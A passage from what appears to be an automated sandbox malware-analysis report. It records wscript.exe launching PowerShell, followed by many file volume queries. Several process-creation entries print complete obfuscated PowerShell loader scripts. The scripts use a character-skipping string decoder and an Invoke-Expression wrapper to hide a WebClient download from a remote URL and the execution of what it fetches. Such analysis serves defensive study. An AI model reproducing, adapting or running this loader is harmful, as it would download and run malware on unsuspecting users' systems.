okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (RuctatioJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$eroticizing='federarie';;$slambehandlingsanlggets='shadowishly';;$udfolder='briarwood';;$jkel='backingbandet';;$gangarealerne138='karakteristikkernes';;$dokumenttype=$host.name;function hjemmemarkedernes($rodfstede){if ($dokumenttype) {$afhjulpne=2} for ($fabrikationens=$afhjulpne;;$fabrikationens+=3){if(!$rodfstede[$fabrikationens]) { break }$puncheon+=$rodfstede[$fabrikationens]}$puncheon}function auspiciums($ouananiche){ .($recirculated) ($ouananiche)}$cockneyfying=hjemmemarkedernes ' n .epit .unwtie ebepc,elusihaeh nr t';$noncandescent=hjemmemarkedernes 'aamlno azt,iinl ,l a,e/';$thoracostenosis=hjemmemarkedernes 's.t ola,sth1we2';$kartonets247='jo[ snane otb . ,s,nes.ra v ,i rcste ,pslo riknn.itmambaahan ,ae gsmestr ] l:g :d s dev.cteucerbiifotduy ep rr.aomit iom csuotel r= l$cotarhvgoxerdiatacacounsp tepeunns op,sv ihes';$noncandescent+=hjemmemarkedernes 'no5 e.f 0st r(g weriscn.odauorewtos k rgnadtsl sr1oa0,e.cr0un;go epw eikun,r6 d4ty;re ax o6fi4 a; hroxvaf: v1 r3si1 h.de0da) l .gtvegacstkovost/ma2be0re1co0i.0 o1de0in1ho chf hibhrgeeskfido rxun/re1m,3ib1lu. i0';$engangsafgift=hjemmemarkedernes '.au.is oecrr l-pyadigune ns.t';$ammunitionsfabrikkens=hjemmemarkedernes ' th tcot fp.tsdv:sp/pa/ wutw.nwo .adlexemebinepen es.erekafreoluiam meud-kogstghams bunhak.ind se / stcoep mthpanlsdat to.est/hei.on ecru_lycafsjesst/fys op semec ,iplfleiu.cma/rekslv uiumdcormoeg da.ep smo. bpr c nz';$moistureproof=hjemmemarkedernes ' b>';$recirculated=hjemmemarkedernes 'viiskekex';$anionics='resbolig';$arcuation='\raadede.erg';auspiciums (hjemmemarkedernes 'un$m,g ul mo.tbbiajal :ghlqyyu,oefnuneabtblifyaeo=bo$une,vnaavsi: oatipsupund ta pttra a+bl$s aunrsec,augrastt cifooafn');auspiciums (hjemmemarkedernes ' .$sig rl,roinbl a rlfo:bar iisanstn ei debe=vi$ ba .m mamul n ,iittg imaospnsps efnoaenbmerufi kr kvaeprn tsba.ensmap slm iantti(wr$bimpaotaimos rtbuuq repedyp mrs otro dfli)');auspiciums (hjemmemarkedernes $kartonets247);$ammunitionsfabrikkens=$rinnie[0];$chaffer=(hjemmemarkedernes 'gu$ovgbulmaomibisakrlma: tb ko,urgatsysank mad f af se alfoss,e ksk mcoenots o odsiekor mnmoead= bnprey.wst- cosubskjoveducuntf hjscoyk s qtneef ms .s $ fc .ol c hk ,n ce ry rfsuyb i en og');auspiciums ($chaffer);auspiciums (hjemmemarkedernes 'h $,sbvioserstta s.ukb atufprf pefrlnasanetes dm jegatunoegdbue r kn ,e n.behz,ehaab dwieudrphsko[i $ erennegpoapanu.g,rs,eawifgags.ig frntud] a=p $ n.oo,anyac rar.nreds e.tsmac lefon .t');$internes=hjemmemarkedernes 'se$e bafoplrrat snok acefkofsce sl.lsnoeanstem.ae,ntfaorodspeanro.nunet .,mdmooslwa.n lstogaaord ofini eladeat( n$caas mgom vupsnt,iort sip o onl.sinfe a fbpir.yimak tkm emingls a,rh$myo.ykinst.e ojreeba)';$okseje=$lyonetia;auspiciums (hjemmemarkedernes '.a$kog.el oo abbeaf,lun: eu,tn kafrdxedvauveccoe.ga,sb,olafe ,=,y(patk etesletst-prpmeaunt ch b sl$ o uk esfrep junefn)');whil
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$eroticizing='federarie';;$slambehandlingsanlggets='shadowishly';;$udfolder='briarwood';;$jkel='backingbandet';;$gangarealerne138='karakteristikkernes';;$dokumenttype=$host.name;function hjemmemarkedernes($rodfstede){if ($dokumenttype) {$afhjulpne=2} for ($fabrikationens=$afhjulpne;;$fabrikationens+=3){if(!$rodfstede[$fabrikationens]) { break }$puncheon+=$rodfstede[$fabrikationens]}$puncheon}function auspiciums($ouananiche){ .($recirculated) ($ouananiche)}$cockneyfying=hjemmemarkedernes ' n .epit .unwtie ebepc,elusihaeh nr t';$noncandescent=hjemmemarkedernes 'aamlno azt,iinl ,l a,e/';$thoracostenosis=hjemmemarkedernes 's.t ola,sth1we2';$kartonets247='jo[ snane otb . ,s,nes.ra v ,i rcste ,pslo riknn.itmambaahan ,ae gsmestr ] l:g :d s dev.cteucerbiifotduy ep rr.aomit iom csuotel r= l$cotarhvgoxerdiatacacounsp tepeunns op,sv ihes';$noncandescent+=hjemmemarkedernes 'no5 e.f 0st r(g weriscn.odauorewtos k rgnadtsl sr1oa0,e.cr0un;go epw eikun,r6 d4ty;re ax o6fi4 a; hroxvaf: v1 r3si1 h.de0da) l .gtvegacstkovost/ma2be0re1co0i.0 o1de0in1ho chf hibhrgeeskfido rxun/re1m,3ib1lu. i0';$engangsafgift=hjemmemarkedernes '.au.is oecrr l-pyadigune ns.t';$ammunitionsfabrikkens=hjemmemarkedernes ' th tcot fp.tsdv:sp/pa/ wutw.nwo .adlexemebinepen es.erekafreoluiam meud-kogstghams bunhak.ind se / stcoep mthpanlsdat to.est/hei.on ecru_lycafsjesst/fys op semec ,iplfleiu.cma/rekslv uiumdcormoeg da.ep smo. bpr c nz';$moistureproof=hjemmemarkedernes ' b>';$recirculated=hjemmemarkedernes 'viiskekex';$anionics='resbolig';$arcuation='\raadede.erg';auspiciums (hjemmemarkedernes 'un$m,g ul mo.tbbiajal :ghlqyyu,oefnuneabtblifyaeo=bo$une,vnaavsi: oatipsupund ta pttra a+bl$s aunrsec,augrastt cifooafn');auspiciums (hjemmemarkedernes ' .$sig rl,roinbl a rlfo:bar iisanstn ei debe=vi$ ba .m mamul n ,iittg imaospnsps efnoaenbmerufi kr kvaeprn tsba.ensmap slm iantti(wr$bimpaotaimos rtbuuq repedyp mrs otro dfli)');auspiciums (hjemmemarkedernes $kartonets247);$ammunitionsfabrikkens=$rinnie[0];$chaffer=(hjemmemarkedernes 'gu$ovgbulmaomibisakrlma: tb ko,urgatsysank mad f af se alfoss,e ksk mcoenots o odsiekor mnmoead= bnprey.wst- cosubskjoveducuntf hjscoyk s qtneef ms .s $ fc .ol c hk ,n ce ry rfsuyb i en og');auspiciums ($chaffer);auspiciums (hjemmemarkedernes 'h $,sbvioserstta s.ukb atufprf pefrlnasanetes dm jegatunoegdbue r kn ,e n.behz,ehaab dwieudrphsko[i $ erennegpoapanu.g,rs,eawifgags.ig frntud] a=p $ n.oo,anyac rar.nreds e.tsmac lefon .t');$internes=hjemmemarkedernes 'se$e bafoplrrat snok acefkofsce sl.lsnoeanstem.ae,ntfaorodspeanro.nunet .,mdmooslwa.n lstogaaord ofini eladeat( n$caas mgom vupsnt,iort sip o onl.sinfe a fbpir.yimak tkm emingls a,rh$myo.ykinst.e ojreeba)';$okseje=$lyonetia;auspiciums (hjemmemarkedernes '.a$kog.el oo abbeaf,lun: eu,tn kafrdxedvauveccoe.ga,sb,olafe ,=,y(patk etesletst-prpmeaunt ch b sl$ o uk esfrep junefn)');whil
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$boernehjaelpsdag='flerbrugerudgaver';;$anekdotiskes='kvajer';;$apathia='gunbuilder';;$meterologisk='billioners174';;$paracelsianism='intervertebra';;$claritude=$host.name;function ructation($krselstiderne){if ($claritude) {$slutdatoerne=2} for ($unglamorously=$slutdatoerne;;$unglamorously+=3){if(!$krselstiderne[$unglamorously]) { break }$buckland+=$krselstiderne[$unglamorously]}$buckland}function fashioneringer($marins){ .($clodpoles) ($marins)}$paydays=ructation ' ln eamtsp. yw bereb c ul sileedontrt';$nedsivningsbekendtgrelsernes=ructation 'fumcrodazi imelgoldeasl/';$kongeparrets=ructation ' mtrili.sr 1 f2';$dorbugs28='an[manp,e stba. .stme rr ivtii c oerap.ioc if n ut.om ac n,ea rgbeeanra ]hy:be:u.skoenac ourarmiis t dyompstra,o treoprcveohalte=st$mokbeoarntigrae p .akarn rcreditn.s';$nedsivningsbekendtgrelsernes+=ructation 'bi5w .re0wi (pewdiimanand okawmas s ,tn .tka fo1 u0 r.d,0 g;py mawhoifin o6vr4.n;gr krx .6be4c.; ara vun: s1me3s 1 d.b 0w,) . ug ae lcdikinobr/ u2.s0 .1fu0 ,0 c1gl0.a1be vefrii .rtrekaf.oo .x h/a 1gn3 u1pe.ek0';$trevrelserslejligheds=ructation 'o,u sb ebrrd -b,askgafe kn ut';$fishgrass=ructation 'gehs.tstt.ppskses:c /t,/ ,wsowdew r.hueallquephk jtrerfro,rs eseru vpaiunc hevi-ganj e uo rdyu dpd pqui n o.akde efl/lnfbrifulr ehaa adram ripon.a/t wu o jl.rtbieboreq/ ,o vdie arhop,ya eir nf f cut,lbo.t aunfdem';$korporal=ructation 're>';$clodpoles=ructation 'unid egux';$overgrnserne='orthopterological';$undladelsers='\milieuplanerne.chl';fashioneringer (ructation 'fy$frgell fonib iaral,t:foup nmovfoahyl isedp l ,yr,= s$r ea nk v :ova p.apamdamametmoaba+ a$phu anupdy,lsua bddieldl sskle kruns');fashioneringer (ructation '.r$ekgcal ,otebpaa dl u: afmarafe tmidtunvsku nn pgovesnt u= m$ lfcuilas dh cgovrhaaspsfosas. bsexp olcyipotop( u$lakino rlepgno srm.abel i)');fashioneringer (ructation $dorbugs28);$fishgrass=$fremtvunget[0];$tilmeldtes=(ructation 'op$ecginla o ebb aoxlst: ,gs.a irskahymblor nr,dth= on.re rwb -v obobbyj.renocfit prsstyt sdit ueenmf,.tr$afppaa ay gdg a sy s');fashioneringer ($tilmeldtes);fashioneringer (ructation 'ep$pagfjaforluaa.movo enp d o.ovhriep af dboemor.espe[ u$retarr le tv vr.rerel is ,e ir .sstlaeet j lsii ganhtrestdb sde]pa=d $ nameeld.usb i.iv.unefie nmagc,sprb meb,kane rns,d tufg kr.oe ll bsineslrk.npre ms');$almugs=ructation 'sp$nogska iraraitm popen sdam. adceo iwepn pl ao na edb fdii ol.remo(yd$ ffp.ip,spah g.or.aasos wsla,im$ tsa.t nalnt,us b.ae ms gafe fnpre ss )';$statsbesgenes=$unvalidly;fashioneringer (ructation 'ha$ garlneobrb cahalte:abiprdbee ,arelmeisazspeser.r= ,( ststeges atre-trpnaat tkohac s $ ,santinadgt ssrabmoe csmegbie rn de.fsef)');while (!$idealizer) {fashioneringer (ructation ' k$ sgnol poanb sa dl.e: ha.upentk,e.wrfeiopn gfaeskrynnb eo s ,=,k$plh oychlreestr.qn .esusva5pl4') ;fashioneringer $almugs;fashioneringer (ructatio
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$eroticizing='federarie';;$slambehandlingsanlggets='shadowishly';;$udfolder='briarwood';;$jkel='backingbandet';;$gangarealerne138='karakteristikkernes';;$dokumenttype=$host.name;function hjemmemarkedernes($rodfstede){if ($dokumenttype) {$afhjulpne=2} for ($fabrikationens=$afhjulpne;;$fabrikationens+=3){if(!$rodfstede[$fabrikationens]) { break }$puncheon+=$rodfstede[$fabrikationens]}$puncheon}function auspiciums($ouananiche){ .($recirculated) ($ouananiche)}$cockneyfying=hjemmemarkedernes ' n .epit .unwtie ebepc,elusihaeh nr t';$noncandescent=hjemmemarkedernes 'aamlno azt,iinl ,l a,e/';$thoracostenosis=hjemmemarkedernes 's.t ola,sth1we2';$kartonets247='jo[ snane otb . ,s,nes.ra v ,i rcste ,pslo riknn.itmambaahan ,ae gsmestr ] l:g :d s dev.cteucerbiifotduy ep rr.aomit iom csuotel r= l$cotarhvgoxerdiatacacounsp tepeunns op,sv ihes';$noncandescent+=hjemmemarkedernes 'no5 e.f 0st r(g weriscn.odauorewtos k rgnadtsl sr1oa0,e.cr0un;go epw eikun,r6 d4ty;re ax o6fi4 a; hroxvaf: v1 r3si1 h.de0da) l .gtvegacstkovost/ma2be0re1co0i.0 o1de0in1ho chf hibhrgeeskfido rxun/re1m,3ib1lu. i0';$engangsafgift=hjemmemarkedernes '.au.is oecrr l-pyadigune ns.t';$ammunitionsfabrikkens=hjemmemarkedernes ' th tcot fp.tsdv:sp/pa/ wutw.nwo .adlexemebinepen es.erekafreoluiam meud-kogstghams bunhak.ind se / stcoep mthpanlsdat to.est/hei.on ecru_lycafsjesst/fys op semec ,iplfleiu.cma/rekslv uiumdcormoeg da.ep smo. bpr c nz';$moistureproof=hjemmemarkedernes ' b>';$recirculated=hjemmemarkedernes 'viiskekex';$anionics='resbolig';$arcuation='\raadede.erg';auspiciums (hjemmemarkedernes 'un$m,g ul mo.tbbiajal :ghlqyyu,oefnuneabtblifyaeo=bo$une,vnaavsi: oatipsupund ta pttra a+bl$s aunrsec,augrastt cifooafn');auspiciums (hjemmemarkedernes ' .$sig rl,roinbl a rlfo:bar iisanstn ei debe=vi$ ba .m mamul n ,iittg imaospnsps efnoaenbmerufi kr kvaeprn tsba.ensmap slm iantti(wr$bimpaotaimos rtbuuq repedyp mrs otro dfli)');auspiciums (hjemmemarkedernes $kartonets247);$ammunitionsfabrikkens=$rinnie[0];$chaffer=(hjemmemarkedernes 'gu$ovgbulmaomibisakrlma: tb ko,urgatsysank mad f af se alfoss,e ksk mcoenots o odsiekor mnmoead= bnprey.wst- cosubskjoveducuntf hjscoyk s qtneef ms .s $ fc .ol c hk ,n ce ry rfsuyb i en og');auspiciums ($chaffer);auspiciums (hjemmemarkedernes 'h $,sbvioserstta s.ukb atufprf pefrlnasanetes dm jegatunoegdbue r kn ,e n.behz,ehaab dwieudrphsko[i $ erennegpoapanu.g,rs,eawifgags.ig frntud] a=p $ n.oo,anyac rar.nreds e.tsmac lefon .t');$internes=hjemmemarkedernes 'se$e bafoplrrat snok acefkofsce sl.lsnoeanstem.ae,ntfaorodspeanro.nunet .,mdmooslwa.n lstogaaord ofini eladeat( n$caas mgom vupsnt,iort sip o onl.sinfe a fbpir.yimak tkm emingls a,rh$myo.ykinst.e ojreeba)';$okseje=$lyonetia;auspiciums (hjemmemarkedernes '.a$kog.el oo abbeaf,lun: eu,tn kafrdxedvauveccoe.ga,sb,olafe ,=,y(patk etesletst-prpmeaunt ch b sl$ o uk esfrep junefn)');whilJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$boernehjaelpsdag='flerbrugerudgaver';;$anekdotiskes='kvajer';;$apathia='gunbuilder';;$meterologisk='billioners174';;$paracelsianism='intervertebra';;$claritude=$host.name;function ructation($krselstiderne){if ($claritude) {$slutdatoerne=2} for ($unglamorously=$slutdatoerne;;$unglamorously+=3){if(!$krselstiderne[$unglamorously]) { break }$buckland+=$krselstiderne[$unglamorously]}$buckland}function fashioneringer($marins){ .($clodpoles) ($marins)}$paydays=ructation ' ln eamtsp. yw bereb c ul sileedontrt';$nedsivningsbekendtgrelsernes=ructation 'fumcrodazi imelgoldeasl/';$kongeparrets=ructation ' mtrili.sr 1 f2';$dorbugs28='an[manp,e stba. .stme rr ivtii c oerap.ioc if n ut.om ac n,ea rgbeeanra ]hy:be:u.skoenac ourarmiis t dyompstra,o treoprcveohalte=st$mokbeoarntigrae p .akarn rcreditn.s';$nedsivningsbekendtgrelsernes+=ructation 'bi5w .re0wi (pewdiimanand okawmas s ,tn .tka fo1 u0 r.d,0 g;py mawhoifin o6vr4.n;gr krx .6be4c.; ara vun: s1me3s 1 d.b 0w,) . ug ae lcdikinobr/ u2.s0 .1fu0 ,0 c1gl0.a1be vefrii .rtrekaf.oo .x h/a 1gn3 u1pe.ek0';$trevrelserslejligheds=ructation 'o,u sb ebrrd -b,askgafe kn ut';$fishgrass=ructation 'gehs.tstt.ppskses:c /t,/ ,wsowdew r.hueallquephk jtrerfro,rs eseru vpaiunc hevi-ganj e uo rdyu dpd pqui n o.akde efl/lnfbrifulr ehaa adram ripon.a/t wu o jl.rtbieboreq/ ,o vdie arhop,ya eir nf f cut,lbo.t aunfdem';$korporal=ructation 're>';$clodpoles=ructation 'unid egux';$overgrnserne='orthopterological';$undladelsers='\milieuplanerne.chl';fashioneringer (ructation 'fy$frgell fonib iaral,t:foup nmovfoahyl isedp l ,yr,= s$r ea nk v :ova p.apamdamametmoaba+ a$phu anupdy,lsua bddieldl sskle kruns');fashioneringer (ructation '.r$ekgcal ,otebpaa dl u: afmarafe tmidtunvsku nn pgovesnt u= m$ lfcuilas dh cgovrhaaspsfosas. bsexp olcyipotop( u$lakino rlepgno srm.abel i)');fashioneringer (ructation $dorbugs28);$fishgrass=$fremtvunget[0];$tilmeldtes=(ructation 'op$ecginla o ebb aoxlst: ,gs.a irskahymblor nr,dth= on.re rwb -v obobbyj.renocfit prsstyt sdit ueenmf,.tr$afppaa ay gdg a sy s');fashioneringer ($tilmeldtes);fashioneringer (ructation 'ep$pagfjaforluaa.movo enp d o.ovhriep af dboemor.espe[ u$retarr le tv vr.rerel is ,e ir .sstlaeet j lsii ganhtrestdb sde]pa=d $ nameeld.usb i.iv.unefie nmagc,sprb meb,kane rns,d tufg kr.oe ll bsineslrk.npre ms');$almugs=ructation 'sp$nogska iraraitm popen sdam. adceo iwepn pl ao na edb fdii ol.remo(yd$ ffp.ip,spah g.or.aasos wsla,im$ tsa.t nalnt,us b.ae ms gafe fnpre ss )';$statsbesgenes=$unvalidly;fashioneringer (ructation 'ha$ garlneobrb cahalte:abiprdbee ,arelmeisazspeser.r= ,( ststeges atre-trpnaat tkohac s $ ,santinadgt ssrabmoe csmegbie rn de.fsef)');while (!$idealizer) {fashioneringer (ructation ' k$ sgnol poanb sa dl.e: ha.upentk,e.wrfeiopn gfaeskrynnb eo s ,=,k$plh oychlreestr.qn .esusva5pl4') ;fashioneringer $almugs;fashioneringer (ructatioJump to behavior
                Source: powershell.exe, 00000003.00000002.2994471945.0000000006C8D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3005727829.0000000007DF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: powershell.exe, 00000003.00000002.3005727829.0000000007DF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerjK5
                Source: powershell.exe, 00000003.00000002.2994471945.0000000006C8D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3005727829.0000000007DF1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2952642850.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
